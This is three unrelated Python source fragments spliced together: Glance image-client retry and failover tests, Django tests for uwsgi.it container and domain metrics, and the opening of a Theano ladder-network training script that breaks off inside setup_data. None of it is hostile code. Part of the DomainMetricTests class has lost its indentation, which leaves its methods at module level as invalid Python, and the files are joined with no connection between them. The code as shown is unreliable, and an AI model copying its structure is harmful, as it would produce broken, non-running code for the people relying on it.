        expected = [
            {
                'id': image_id,
                'name': 'image10',
                'is_public': True,
                'size': None,
                'min_disk': None,
                'min_ram': None,
                'disk_format': None,
                'container_format': None,
                'checksum': None,
                'created_at': self.NOW_DATETIME,
                'updated_at': self.NOW_DATETIME,
                'deleted_at': None,
                'deleted': None,
                'status': None,
                'properties': {},
                'owner': None,
            },
        ]
        self.assertEqual(image_metas, expected)

    def test_show_makes_datetimes(self):
        # Wire-format timestamps are converted to datetime objects by show().
        fixture = self._make_datetime_fixture()
        image_id = self.service.create(self.context, fixture)['id']
        image_meta = self.service.show(self.context, image_id)
        self.assertEqual(image_meta['created_at'], self.NOW_DATETIME)
        self.assertEqual(image_meta['updated_at'], self.NOW_DATETIME)

    def test_detail_makes_datetimes(self):
        # Same conversion applies to detail().
        fixture = self._make_datetime_fixture()
        self.service.create(self.context, fixture)
        image_meta = self.service.detail(self.context)[0]
        self.assertEqual(image_meta['created_at'], self.NOW_DATETIME)
        self.assertEqual(image_meta['updated_at'], self.NOW_DATETIME)

    def test_download_with_retries(self):
        tries = [0]

        class MyGlanceStubClient(glance_stubs.StubGlanceClient):
            """A client that fails the first time, then succeeds."""
            def get(self, image_id):
                if tries[0] == 0:
                    tries[0] = 1
                    raise glanceclient.exc.ServiceUnavailable('')
                else:
                    return {}

        client = MyGlanceStubClient()
        service = self._create_image_service(client)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        # When retries are disabled, we should get an exception
        self.flags(glance_num_retries=0)
        self.assertRaises(exception.GlanceConnectionFailed,
                service.download, self.context, image_id, writer)
        # Now lets enable retries. No exception should happen now.
        tries = [0]
        self.flags(glance_num_retries=1)
        service.download(self.context, image_id, writer)

    def test_client_forbidden_converts_to_imagenotauthed(self):
        class MyGlanceStubClient(glance_stubs.StubGlanceClient):
            """A client that raises a Forbidden exception."""
            def get(self, image_id):
                raise glanceclient.exc.Forbidden(image_id)

        client = MyGlanceStubClient()
        service = self._create_image_service(client)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotAuthorized, service.download,
                          self.context, image_id, writer)

    def test_client_httpforbidden_converts_to_imagenotauthed(self):
        class MyGlanceStubClient(glance_stubs.StubGlanceClient):
            """A client that raises a HTTPForbidden exception."""
            def get(self, image_id):
                raise glanceclient.exc.HTTPForbidden(image_id)

        client = MyGlanceStubClient()
        service = self._create_image_service(client)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotAuthorized, service.download,
                          self.context, image_id, writer)

    def test_client_notfound_converts_to_imagenotfound(self):
        class MyGlanceStubClient(glance_stubs.StubGlanceClient):
            """A client that raises a NotFound exception."""
            def get(self, image_id):
                raise glanceclient.exc.NotFound(image_id)

        client = MyGlanceStubClient()
        service = self._create_image_service(client)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotFound, service.download,
                          self.context, image_id, writer)

    def test_client_httpnotfound_converts_to_imagenotfound(self):
        class MyGlanceStubClient(glance_stubs.StubGlanceClient):
            """A client that raises a HTTPNotFound exception."""
            def get(self, image_id):
                raise glanceclient.exc.HTTPNotFound(image_id)

        client = MyGlanceStubClient()
        service = self._create_image_service(client)
        image_id = 1  # doesn't matter
        writer = NullWriter()
        self.assertRaises(exception.ImageNotFound, service.download,
                          self.context, image_id, writer)

    def test_glance_client_image_id(self):
        # A bare image id resolves to a service plus the same id.
        fixture = self._make_fixture(name='test image')
        image_id = self.service.create(self.context, fixture)['id']
        (service, same_id) = glance.get_remote_image_service(
                self.context, image_id)
        self.assertEquals(same_id, image_id)

    def test_glance_client_image_ref(self):
        # A full image URL resolves to a service pointed at that host.
        fixture = self._make_fixture(name='test image')
        image_id = self.service.create(self.context, fixture)['id']
        image_url = 'http://something-less-likely/%s' % image_id
        (service, same_id) = glance.get_remote_image_service(
                self.context, image_url)
        self.assertEquals(same_id, image_id)
        self.assertEquals(service._client.host,
                          'something-less-likely')
def _create_failing_glance_client(info):
    """Build a stub glance client whose ``get`` fails once, then succeeds.

    Every call increments ``info['num_calls']``; the very first call raises
    ``ServiceUnavailable`` and all later calls return an empty dict.
    """
    class _FlakyClient(glance_stubs.StubGlanceClient):
        """A client that fails the first time, then succeeds."""
        def get(self, image_id):
            info['num_calls'] += 1
            first_attempt = info['num_calls'] == 1
            if first_attempt:
                raise glanceclient.exc.ServiceUnavailable('')
            return {}

    return _FlakyClient()
class TestGlanceClientWrapper(test.TestCase):
    """Tests GlanceClientWrapper retry/failover behaviour over the
    configured glance_api_servers list."""

    def setUp(self):
        super(TestGlanceClientWrapper, self).setUp()
        # host1 has no scheme, which is http by default
        self.flags(glance_api_servers=['host1:9292', 'https://host2:9293',
            'http://host3:9294'])

        # Make the test run fast
        def _fake_sleep(secs):
            pass
        self.stubs.Set(time, 'sleep', _fake_sleep)

    def test_static_client_without_retries(self):
        # A wrapper pinned to one host fails immediately with retries off.
        self.flags(glance_num_retries=0)
        ctxt = context.RequestContext('fake', 'fake')
        fake_host = 'host4'
        fake_port = 9295
        fake_use_ssl = False
        info = {'num_calls': 0}

        def _fake_create_glance_client(context, host, port, use_ssl, version):
            self.assertEqual(host, fake_host)
            self.assertEqual(port, fake_port)
            self.assertEqual(use_ssl, fake_use_ssl)
            return _create_failing_glance_client(info)
        self.stubs.Set(glance, '_create_glance_client',
                _fake_create_glance_client)
        client = glance.GlanceClientWrapper(context=ctxt,
                host=fake_host, port=fake_port, use_ssl=fake_use_ssl)
        self.assertRaises(exception.GlanceConnectionFailed,
                client.call, ctxt, 1, 'get', 'meow')
        self.assertEqual(info['num_calls'], 1)

    def test_default_client_without_retries(self):
        # With retries off, each wrapper tries exactly one configured server.
        self.flags(glance_num_retries=0)
        ctxt = context.RequestContext('fake', 'fake')
        info = {'num_calls': 0,
                'host': 'host1',
                'port': 9292,
                'use_ssl': False}

        # Leave the list in a known-order
        def _fake_shuffle(servers):
            pass

        def _fake_create_glance_client(context, host, port, use_ssl, version):
            self.assertEqual(host, info['host'])
            self.assertEqual(port, info['port'])
            self.assertEqual(use_ssl, info['use_ssl'])
            return _create_failing_glance_client(info)
        self.stubs.Set(random, 'shuffle', _fake_shuffle)
        self.stubs.Set(glance, '_create_glance_client',
                _fake_create_glance_client)
        client = glance.GlanceClientWrapper()
        client2 = glance.GlanceClientWrapper()
        self.assertRaises(exception.GlanceConnectionFailed,
                client.call, ctxt, 1, 'get', 'meow')
        self.assertEqual(info['num_calls'], 1)

        # Reset the counter and expect the second wrapper to pick the next
        # server (host2, https) after our deterministic "shuffle".
        info = {'num_calls': 0,
                'host': 'host2',
                'port': 9293,
                'use_ssl': True}

        def _fake_shuffle2(servers):
            # fake shuffle in a known manner
            servers.append(servers.pop(0))
        self.stubs.Set(random, 'shuffle', _fake_shuffle2)

        self.assertRaises(exception.GlanceConnectionFailed,
                client2.call, ctxt, 1, 'get', 'meow')
        self.assertEqual(info['num_calls'], 1)

    def test_static_client_with_retries(self):
        # One retry is enough: the flaky client fails once, then succeeds.
        self.flags(glance_num_retries=1)
        ctxt = context.RequestContext('fake', 'fake')
        fake_host = 'host4'
        fake_port = 9295
        fake_use_ssl = False
        info = {'num_calls': 0}

        def _fake_create_glance_client(context, host, port, use_ssl, version):
            self.assertEqual(host, fake_host)
            self.assertEqual(port, fake_port)
            self.assertEqual(use_ssl, fake_use_ssl)
            return _create_failing_glance_client(info)
        self.stubs.Set(glance, '_create_glance_client',
                _fake_create_glance_client)
        client = glance.GlanceClientWrapper(context=ctxt,
                host=fake_host, port=fake_port, use_ssl=fake_use_ssl)
        client.call(ctxt, 1, 'get', 'meow')
        self.assertEqual(info['num_calls'], 2)

    def test_default_client_with_retries(self):
        # The retry must move to the NEXT configured server (hostN -> hostN+1),
        # which the attempt-indexed keys below verify.
        self.flags(glance_num_retries=1)
        ctxt = context.RequestContext('fake', 'fake')
        info = {'num_calls': 0,
                'host0': 'host1',
                'port0': 9292,
                'use_ssl0': False,
                'host1': 'host2',
                'port1': 9293,
                'use_ssl1': True}

        # Leave the list in a known-order
        def _fake_shuffle(servers):
            pass

        def _fake_create_glance_client(context, host, port, use_ssl, version):
            attempt = info['num_calls']
            self.assertEqual(host, info['host%s' % attempt])
            self.assertEqual(port, info['port%s' % attempt])
            self.assertEqual(use_ssl, info['use_ssl%s' % attempt])
            return _create_failing_glance_client(info)
        self.stubs.Set(random, 'shuffle', _fake_shuffle)
        self.stubs.Set(glance, '_create_glance_client',
                _fake_create_glance_client)
        client = glance.GlanceClientWrapper()
        client2 = glance.GlanceClientWrapper()
        client.call(ctxt, 1, 'get', 'meow')
        self.assertEqual(info['num_calls'], 2)

        def _fake_shuffle2(servers):
            # fake shuffle in a known manner
            servers.append(servers.pop(0))
        self.stubs.Set(random, 'shuffle', _fake_shuffle2)

        info = {'num_calls': 0,
                'host0': 'host2',
                'port0': 9293,
                'use_ssl0': True,
                'host1': 'host3',
                'port1': 9294,
                'use_ssl1': False}

        client2.call(ctxt, 1, 'get', 'meow')
        self.assertEqual(info['num_calls'], 2)
|
|
import random
import json
from datetime import date, timedelta
from django.test import TestCase
from django.conf import settings
from django.utils.six.moves import xrange
from uwsgiit.api import UwsgiItClient
from console.utils import daterange
from console.models import *
class MetricTesterMixin():
    """Shared helpers for the metric test cases: a uwsgi.it API client
    factory and DB fixtures covering every day of 2010."""

    @classmethod
    def istanceUwsgiItClient(cls):
        """Attach a UwsgiItClient built from the test settings to the class.

        NOTE(review): the name looks like a typo of "instance..."; it is kept
        unchanged because it is part of the mixin's public interface.
        """
        cls.client = UwsgiItClient(
            settings.TEST_USER,
            settings.TEST_PASSWORD,
            settings.DEFAULT_API_URL)

    @classmethod
    def createTestMetrics(cls, metric_class):
        """Create one ``metric_class`` row per day of 2010 in the DB.

        Accepts ContainerMetric or DomainMetric subclasses; raises TypeError
        for anything else.  Created instances are kept in ``cls.test_metrics``
        so destroyTestMetrics() can remove them.
        """
        parameters = {'container': 1}
        if issubclass(metric_class, ContainerMetric):
            pass
        elif issubclass(metric_class, DomainMetric):
            parameters['domain'] = 1
        else:
            raise TypeError('Cannot handle {class_name} class'.format(
                class_name=metric_class.__name__))
        start = date(2010, 1, 1)
        end = date(2010, 12, 31)
        cls.test_metrics = []
        for day in daterange(start, end):
            # Named metric_json (not "json") so we do not shadow the
            # module-level ``json`` import.
            metric_json = []
            for _ in xrange(5):
                metric_json.append([random.randint(1, 100),
                                    random.randint(1, 100)])
            parameters['day'] = day.day
            parameters['month'] = day.month
            parameters['year'] = day.year
            parameters['json'] = metric_json
            test_metric = metric_class(**parameters)
            test_metric.save()
            cls.test_metrics.append(test_metric)

    @classmethod
    def destroyTestMetrics(cls):
        """Delete every metric previously created by createTestMetrics()."""
        for metric in cls.test_metrics:
            metric.delete()
class ContainerMetricTests(MetricTesterMixin, TestCase):
    """Container metric model tests.

    NOTE(review): ``self.client`` used below is the Django test client
    (istanceUwsgiItClient is never called here); it appears to work because
    the 2010 queries are served entirely from the DB — confirm.
    """
    @classmethod
    def setUpClass(cls):
        # NOTE(review): does not call super().setUpClass() — confirm this is
        # intentional for the Django version in use.
        cls.createTestMetrics(NetworkRXContainerMetric)
        cls.today = date.today()
        cls.yesterday = cls.today - timedelta(1)
        cls.tomorrow = cls.today + timedelta(1)

    def test_IOReadContainerMetric_returns_right_unit_of_measure(self):
        self.assertEqual(IOReadContainerMetric().unit_of_measure, 'bytes')

    def test_IOWriteContainerMetric_returns_right_unit_of_measure(self):
        self.assertEqual(IOWriteContainerMetric().unit_of_measure, 'bytes')

    def test_NetworkRXContainerMetric_returns_right_unit_of_measure(self):
        self.assertEqual(NetworkRXContainerMetric().unit_of_measure, 'bytes')

    def test_NetworkTXContainerMetric_returns_right_unit_of_measure(self):
        self.assertEqual(NetworkTXContainerMetric().unit_of_measure, 'bytes')

    def test_CPUContainerMetric_returns_right_unit_of_measure(self):
        self.assertEqual(CPUContainerMetric().unit_of_measure, 'ticks')

    def test_MemoryContainerMetric_returns_right_unit_of_measure(self):
        self.assertEqual(MemoryContainerMetric().unit_of_measure, 'bytes')

    def test_QuotaContainerMetric_returns_right_unit_of_measure(self):
        self.assertEqual(QuotaContainerMetric().unit_of_measure, 'bytes')

    def test_generic_metric_to_string_prints_date(self):
        self.assertEqual(self.test_metrics[0].__unicode__(), '2010-1-1')

    def test_metrics_returns_right_json_for_specific_day_from_db(self):
        result = NetworkRXContainerMetric(container=1).metrics(
            self.client, params={'year': 2010, 'month': 1, 'day': 1})
        self.assertEqual(len(result), len(self.test_metrics[0].json))
        self.assertEqual(sorted(result), sorted(self.test_metrics[0].json))

    def test_metrics_returns_right_json_for_specific_month_from_db(self):
        results = NetworkRXContainerMetric(container=1).metrics(
            self.client, params={'year': 2010, 'month': 2})
        # NOTE(review): misnamed — indices 31:59 are the FEBRUARY fixtures
        # (the query above asks for month=2).
        january_metrics = []
        [january_metrics.extend(el.json) for el in self.test_metrics[31:59]]
        self.assertEqual(len(results), len(january_metrics))
        self.assertEqual(sorted(results), sorted(january_metrics))

    def test_metrics_returns_right_json_for_specific_year_from_db(self):
        results = NetworkRXContainerMetric(container=1).metrics(
            self.client, params={'year': 2010})
        year_metrics = []
        [year_metrics.extend(el.json) for el in self.test_metrics]
        self.assertEqual(len(results), len(year_metrics))
        self.assertEqual(sorted(results), sorted(year_metrics))

    def test_metrics_does_not_save_current_day_in_db(self):
        # Today's data is still changing, so it must not be cached in the DB.
        client = UwsgiItClient(
            settings.TEST_USER,
            settings.TEST_PASSWORD,
            settings.DEFAULT_API_URL)
        NetworkRXContainerMetric(container=settings.TEST_CONTAINER).metrics(
            client, params={
                'year': self.today.year,
                'month': self.today.month,
                'day': self.today.day})
        self.assertRaises(
            NetworkRXContainerMetric.DoesNotExist,
            NetworkRXContainerMetric.objects.get,
            **{'container': settings.TEST_CONTAINER,
               'year': self.yesterday.year,
               'month': self.yesterday.month,
               'day': self.yesterday.day})

    def test_metrics_returns_right_json_for_specific_day_from_api_and_saves_in_db(self):
        client = UwsgiItClient(
            settings.TEST_USER,
            settings.TEST_PASSWORD,
            settings.DEFAULT_API_URL)
        results = NetworkRXContainerMetric(
            container=settings.TEST_CONTAINER).metrics(
            client, params={
                'year': self.yesterday.year,
                'month': self.yesterday.month,
                'day': self.yesterday.day})
        # Yesterday's data is final, so it should now be cached in the DB.
        metric_from_db = NetworkRXContainerMetric.objects.get(
            container=settings.TEST_CONTAINER,
            year=self.yesterday.year,
            month=self.yesterday.month,
            day=self.yesterday.day)
        self.assertEqual(results, json.loads(metric_from_db.json))

    def test_metrics_does_not_return_metrics_from_future_asking_for_current_month(self):
        """Assumes that today is not the last day of month"""
        client = UwsgiItClient(
            settings.TEST_USER,
            settings.TEST_PASSWORD,
            settings.DEFAULT_API_URL)
        NetworkRXContainerMetric(container=settings.TEST_CONTAINER).metrics(
            client, params={
                'year': self.today.year,
                'month': self.today.month})
        self.assertRaises(
            NetworkRXContainerMetric.DoesNotExist,
            NetworkRXContainerMetric.objects.get,
            **{'container': settings.TEST_CONTAINER,
               'year': self.tomorrow.year,
               'month': self.tomorrow.month,
               'day': self.tomorrow.day})

    def test_metrics_returns_presents_metrics_from_db_and_missing_metrics_from_api(self):
        """Assumes that today is not the first day of month"""
        client = UwsgiItClient(
            settings.TEST_USER,
            settings.TEST_PASSWORD,
            settings.DEFAULT_API_URL)
        # Pre-seed yesterday with sentinel values that the live API could
        # never return, then check they survive in the merged result.
        test_metric = NetworkRXContainerMetric(
            container=settings.TEST_CONTAINER,
            json=[[-1, -2], [-3, -4]],
            year=self.yesterday.year,
            month=self.yesterday.month,
            day=self.yesterday.day)
        test_metric.save()
        results = NetworkRXContainerMetric(container=settings.TEST_CONTAINER).metrics(
            client, params={
                'year': self.today.year,
                'month': self.today.month})
        self.assertIn(test_metric.json[0], results)
        self.assertIn(test_metric.json[1], results)
        test_metric.delete()

    @classmethod
    def tearDownClass(cls):
        cls.destroyTestMetrics()
class DomainMetricTests(MetricTesterMixin, TestCase):
@classmethod
def setUpClass(cls):
cls.createTestMetrics(NetworkRXDomainMetric)
cls.today = date.today()
cls.yesterday = cls.today - timedelta(1)
cls.tomorrow = cls.today + timedelta(1)
def test_NetworkRXDomainMetric_returns_right_unit_of_measure(self):
self.assertEqual(NetworkRXDomainMetric().unit_of_measure, 'bytes')
def test_NetworkTXDomainMetric_returns_right_unit_of_measure(self):
self.assertEqual(NetworkTXDomainMetric().unit_of_measure, 'bytes')
def test_HitsDomainMetric_returns_right_unit_of_measure(self):
self.assertEqual(HitsDomainMetric().unit_of_measure, 'hits')
def test_generic_metric_to_string_prints_date(self):
self.assertEqual(self.test_metrics[0].__unicode__(), '2010-1-1')
def test_metrics_returns_right_json_for_specific_day_from_db(self):
result = NetworkRXDomainMetric(domain=1).metrics(
self.client, params={'year': 2010, 'month': 1, 'day': 1})
self.assertEqual(len(result), len(self.test_metrics[0].json))
self.assertEqual(sorted(result), sorted(self.test_metrics[0].json))
def test_metrics_returns_right_json_for_specific_month_from_db(self):
results = NetworkRXDomainMetric(domain=1).metrics(
self.client, params={'year': 2010, 'month': 2})
january_metrics = []
[january_metrics.extend(el.json) for el in self.test_metrics[31:59]]
self.assertEqual(len(results), len(january_metrics))
self.assertEqual(sorted(results), sorted(january_metrics))
def test_metrics_returns_right_json_for_specific_year_from_db(self):
results = NetworkRXDomainMetric(domain=1).metrics(
self.client, params={'year': 2010})
year_metrics = []
[year_metrics.extend(el.json) for el in self.test_metrics]
self.assertEqual(len(results), len(year_metrics))
self.assertEqual(sorted(results), sorted(year_metrics))
def test_metrics_does_not_save_current_day_in_db(self):
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
client, params={
'year': self.today.year,
'month': self.today.month,
'day': self.today.day})
self.assertRaises(
NetworkRXDomainMetric.DoesNotExist,
NetworkRXDomainMetric.objects.get,
**{'domain': settings.TEST_DOMAIN,
'year': self.yesterday.year,
'month': self.yesterday.month,
'day': self.yesterday.day})
def test_metrics_returns_right_json_for_specific_day_from_api_and_saves_in_db(self):
client = UwsgiItClient(
settings.TEST_USER,
settings.TEST_PASSWORD,
settings.DEFAULT_API_URL)
results = NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
client, params={
'year': self.yesterday.year,
'month': self.yesterday.month,
'day': self.yesterday.day})
metric_from_db = NetworkRXDomainMetric.objects.get(
domain=settings.TEST_DOMAIN,
year=self.yesterday.year,
month=self.yesterday.month,
day=self.yesterday.day)
self.assertEqual(results, json.loads(metric_from_db.json))
def test_metrics_does_not_return_metrics_from_future_asking_for_current_month(self):
    """Assumes that today is not the last day of month"""
    client = UwsgiItClient(
        settings.TEST_USER,
        settings.TEST_PASSWORD,
        settings.DEFAULT_API_URL)
    # Request the whole current month; days after today cannot exist yet.
    NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
        client, params={
            'year': self.today.year,
            'month': self.today.month})
    # No row may have been cached for tomorrow (a future day).
    self.assertRaises(
        NetworkRXDomainMetric.DoesNotExist,
        NetworkRXDomainMetric.objects.get,
        **{'domain': settings.TEST_DOMAIN,
           'year': self.tomorrow.year,
           'month': self.tomorrow.month,
           'day': self.tomorrow.day})
def test_metrics_returns_presents_metrics_from_db_and_missing_metrics_from_api(self):
    """Assumes that today is not the first day of month"""
    client = UwsgiItClient(
        settings.TEST_USER,
        settings.TEST_PASSWORD,
        settings.DEFAULT_API_URL)
    # Pre-seed the DB with an unmistakable sentinel payload for yesterday;
    # negative values cannot come from the real API.
    test_metric = NetworkRXDomainMetric(
        container=settings.TEST_CONTAINER,
        domain=settings.TEST_DOMAIN,
        json=[[-1, -2], [-3, -4]],
        year=self.yesterday.year,
        month=self.yesterday.month,
        day=self.yesterday.day)
    test_metric.save()
    # Asking for the whole month must merge the cached sentinel row with
    # the remaining days fetched from the API.
    results = NetworkRXDomainMetric(domain=settings.TEST_DOMAIN).metrics(
        client, params={
            'year': self.today.year,
            'month': self.today.month})
    self.assertIn(test_metric.json[0], results)
    self.assertIn(test_metric.json[1], results)
    test_metric.delete()
@classmethod
def tearDownClass(cls):
    # Remove the per-day metric fixtures created for this class
    # (destroyTestMetrics is defined outside this chunk).
    cls.destroyTestMetrics()
|
|
#!/usr/bin/env python
import functools
import logging
import os
import subprocess
from argparse import ArgumentParser, Action
from collections import OrderedDict
import sys
import numpy
import time
import theano
from theano.tensor.type import TensorType
from pandas import DataFrame
from blocks.algorithms import GradientDescent, Adam
from blocks.extensions import FinishAfter
from blocks.extensions.monitoring import TrainingDataMonitoring
from blocks.filter import VariableFilter
from blocks.graph import ComputationGraph
from blocks.main_loop import MainLoop
from blocks.model import Model
from blocks.roles import PARAMETER
from fuel.datasets import MNIST, CIFAR10
from fuel.schemes import ShuffledScheme, SequentialScheme
from fuel.streams import DataStream
from fuel.transformers import Transformer
from picklable_itertools import cycle, imap
from itertools import izip, product, tee
logger = logging.getLogger('main')
from utils import ShortPrinting, prepare_dir, load_df, DummyLoop
from utils import SaveExpParams, SaveLog, SaveParams, AttributeDict
from nn import ZCA, ContrastNorm
from nn import ApproxTestMonitoring, FinalTestMonitoring, TestMonitoring
from nn import LRDecay
from ladder import LadderAE
class Whitening(Transformer):
    """ Makes a copy of the examples in the underlying dataset and whitens it
    if necessary.

    The whole wrapped dataset is materialized in memory up front so that
    contrast normalization and ZCA whitening run once, not per minibatch.
    """
    def __init__(self, data_stream, iteration_scheme, whiten, cnorm=None,
                 **kwargs):
        super(Whitening, self).__init__(data_stream,
                                        iteration_scheme=iteration_scheme,
                                        **kwargs)
        # Pull every example out of the wrapped stream in a single request.
        data = data_stream.get_data(slice(data_stream.dataset.num_examples))
        self.data = []
        for s, d in zip(self.sources, data):
            if 'features' == s:
                # Fuel provides Cifar in uint8, convert to float32
                d = numpy.require(d, dtype=numpy.float32)
                if cnorm is not None:
                    d = cnorm.apply(d)
                if whiten is not None:
                    d = whiten.apply(d)
                self.data += [d]
            elif 'targets' == s:
                # Normalize label arrays to 1-D (see unify_labels).
                d = unify_labels(d)
                self.data += [d]
            else:
                raise Exception("Unsupported Fuel target: %s" % s)
    def get_data(self, request=None):
        # Serve slices of the cached, already-preprocessed arrays.
        # Returns a generator yielding one array per source.
        return (s[request] for s in self.data)
class SemiDataStream(Transformer):
    """ Combines two datastreams into one such that 'target' source (labels)
    is used only from the first one. The second one is renamed
    to avoid collision. Upon iteration, the first one is repeated until
    the second one depletes.
    """
    def __init__(self, data_stream_labeled, data_stream_unlabeled, **kwargs):
        # NOTE(review): super(Transformer, self) deliberately *skips*
        # Transformer.__init__ (which would require a single wrapped
        # data_stream) and runs the grandparent initializer instead —
        # confirm against the installed fuel version before changing.
        super(Transformer, self).__init__(**kwargs)
        self.ds_labeled = data_stream_labeled
        self.ds_unlabeled = data_stream_unlabeled
        # Rename the sources for clarity
        self.ds_labeled.sources = ('features_labeled', 'targets_labeled')
        # Rename the source for input pixels and hide its labels!
        self.ds_unlabeled.sources = ('features_unlabeled',)
    @property
    def sources(self):
        # An explicitly assigned value wins; otherwise expose both streams'
        # (renamed) sources concatenated.
        if hasattr(self, '_sources'):
            return self._sources
        return self.ds_labeled.sources + self.ds_unlabeled.sources
    @sources.setter
    def sources(self, value):
        self._sources = value
    def close(self):
        self.ds_labeled.close()
        self.ds_unlabeled.close()
    def reset(self):
        self.ds_labeled.reset()
        self.ds_unlabeled.reset()
    def next_epoch(self):
        self.ds_labeled.next_epoch()
        self.ds_unlabeled.next_epoch()
    def get_epoch_iterator(self, **kwargs):
        # Cycle the (typically smaller) labeled stream until the unlabeled
        # stream is exhausted; each step yields one merged batch dict.
        unlabeled = self.ds_unlabeled.get_epoch_iterator(**kwargs)
        labeled = self.ds_labeled.get_epoch_iterator(**kwargs)
        assert type(labeled) == type(unlabeled)
        return imap(self.mergedicts, cycle(labeled), unlabeled)
    def mergedicts(self, x, y):
        # Merge one labeled and one unlabeled batch dict; keys are disjoint
        # thanks to the renaming done in __init__.
        return dict(list(x.items()) + list(y.items()))
def unify_labels(y):
    """Flatten a label array to 1-D without changing the example count.

    Work-around for a Fuel inconsistency where MNIST and Cifar-10 expose
    targets with different dimensionality, e.g. (50000, 1) vs (60000,).
    """
    n_examples = y.shape[0]
    flat = y.flatten()
    assert flat.shape[0] == n_examples
    return flat
def make_datastream(dataset, indices, batch_size,
                    n_labeled=None, n_unlabeled=None,
                    balanced_classes=True, whiten=None, cnorm=None,
                    scheme=ShuffledScheme, dseed=None):
    """Build a SemiDataStream serving labeled and unlabeled minibatches.

    :param dataset: a Fuel dataset with 'features' and 'targets' sources
    :param indices: example indices available to this stream
    :param batch_size: minibatch size (None -> one batch with everything)
    :param n_labeled: None, int, or tuple.
        If None or 0 then all indices are used as labeled data, otherwise
        only the first n_labeled indices are used as labeled. If a *tuple*
        (the docstring used to say list) balanced_classes must be True and
        the tuple gives the number of examples to take from each class.
    :param n_unlabeled: how many indices feed the unlabeled stream
        (None -> all of them)
    :param balanced_classes: equalize per-class labeled counts
    :param whiten: optional fitted ZCA instance
    :param cnorm: optional ContrastNorm instance
    :param scheme: Fuel iteration scheme class
    :param dseed: NOTE(review) accepted but unused in this body — confirm
        whether it was meant to seed anything here.
    :return: a SemiDataStream
    """
    if isinstance(n_labeled,tuple):
        assert balanced_classes
        n_labeled_list = n_labeled
        n_labeled = sum(n_labeled) if len(n_labeled) > 0 else 0
    else:
        n_labeled_list = None
    if n_labeled is None or n_labeled == 0:
        n_labeled = len(indices)
    if batch_size is None:
        batch_size = len(indices)
    if n_unlabeled is None:
        n_unlabeled = len(indices)
    assert n_labeled <= n_unlabeled, 'need less labeled than unlabeled'
    all_data = dataset.data_sources[dataset.sources.index('targets')]
    y = unify_labels(all_data)[indices]
    if len(y):
        # Assumes labels are 0..max contiguous integers.
        n_classes = y.max() + 1
        assert n_labeled_list is None or len(n_labeled_list) == n_classes
        logger.info('#samples %d #class %d' % (len(y),n_classes))
        for c in range(n_classes):
            c_count = (y == c).sum()
            logger.info('Class %d size %d %f%%' % (c, c_count, float(c_count)/len(y)))
    # Get unlabeled indices
    i_unlabeled = indices[:n_unlabeled]
    if balanced_classes and n_labeled < n_unlabeled:
        # Ensure each label is equally represented
        logger.info('Balancing %d labels...' % n_labeled)
        assert n_labeled % n_classes == 0
        # Integer division under Python 2 (this file uses izip/iteritems).
        n_from_each_class = n_labeled / n_classes
        i_labeled = []
        for c in range(n_classes):
            n_from_class = n_from_each_class if n_labeled_list is None else n_labeled_list[c]
            # if a class does not have enough examples, then duplicate
            ids = []
            while len(ids) < n_from_class:
                n = n_from_class - len(ids)
                i = (i_unlabeled[y[:n_unlabeled] == c])[:n]
                ids += list(i)
            i_labeled += ids
        # no need to shuffle the samples because latter
        # ds=SemiDataStream(...,iteration_scheme=ShuffledScheme,...)
    else:
        i_labeled = indices[:n_labeled]
    ds = SemiDataStream(
        data_stream_labeled=Whitening(
            DataStream(dataset),
            iteration_scheme=scheme(i_labeled, batch_size),
            whiten=whiten, cnorm=cnorm),
        data_stream_unlabeled=Whitening(
            DataStream(dataset),
            iteration_scheme=scheme(i_unlabeled, batch_size),
            whiten=whiten, cnorm=cnorm)
    )
    return ds
def setup_model(p):
    """Build the ladder network graph and optionally restore trained weights.

    :param p: AttributeDict of hyperparameters; ``p.encoder_layers[0]``
        defines the input shape, optional ``p.load_from`` a directory
        containing ``trained_params.npz``.
    :return: the constructed LadderAE instance
    """
    ladder = LadderAE(p)
    # Setup inputs
    input_type = TensorType('float32', [False] * (len(p.encoder_layers[0]) + 1))
    x_only = input_type('features_unlabeled')
    x = input_type('features_labeled')
    y = theano.tensor.lvector('targets_labeled')
    ladder.apply(x, y, x_only)
    # Load parameters if requested
    if p.get('load_from'):
        with open(p.load_from + '/trained_params.npz') as f:
            loaded = numpy.load(f)
            # NOTE(review): the .npz archive is opened in text mode and
            # NpzFile reads lazily, so all accesses must stay inside the
            # 'with' block; 'rb' would be the conventional mode — confirm.
            cg = ComputationGraph([ladder.costs.total])
            current_params = VariableFilter(roles=[PARAMETER])(cg.variables)
            logger.info('Loading parameters: %s' % ', '.join(loaded.keys()))
            for param in current_params:
                # Shapes must match exactly before overwriting each shared var.
                assert param.get_value().shape == loaded[param.name].shape
                param.set_value(loaded[param.name])
    return ladder
def load_and_log_params(cli_params):
    """Merge CLI parameters with a previously saved parameter set and log them.

    :param cli_params: dict of command-line parameters
    :return: (params, loaded) where loaded is True when a saved experiment
        was found via 'load_from' and its params were used as the base.
    """
    cli_params = AttributeDict(cli_params)
    if cli_params.get('load_from'):
        # Saved params are the base; CLI values override them below.
        p = load_df(cli_params.load_from, 'params').to_dict()[0]
        p = AttributeDict(p)
        for key in cli_params.iterkeys():
            if key not in p:
                p[key] = None
        new_params = cli_params
        loaded = True
    else:
        p = cli_params
        new_params = {}
        loaded = False
    # Make dseed seed unless specified explicitly
    if p.get('dseed') is None and p.get('seed') is not None:
        p['dseed'] = p['seed']
    logger.info('== COMMAND LINE ==')
    logger.info(' '.join(sys.argv))
    logger.info('== PARAMETERS ==')
    for k, v in p.iteritems():
        if new_params.get(k) is not None:
            # CLI override wins; show what replaced the stored value.
            p[k] = new_params[k]
            replace_str = "<- " + str(new_params.get(k))
        else:
            replace_str = ""
        logger.info(" {:20}: {:<20} {}".format(k, v, replace_str))
    return p, loaded
def setup_data(p, test_set=False):
    """Load the dataset named by ``p.dataset`` and build train/valid splits.

    :param p: hyperparameter AttributeDict
    :param test_set: also load the test split when True
    :return: (in_dim, d, whiten, cnorm) where d holds datasets and index
        arrays, whiten is a fitted ZCA or None, cnorm a ContrastNorm or None.
    """
    if p.dataset in ['cifar10','mnist']:
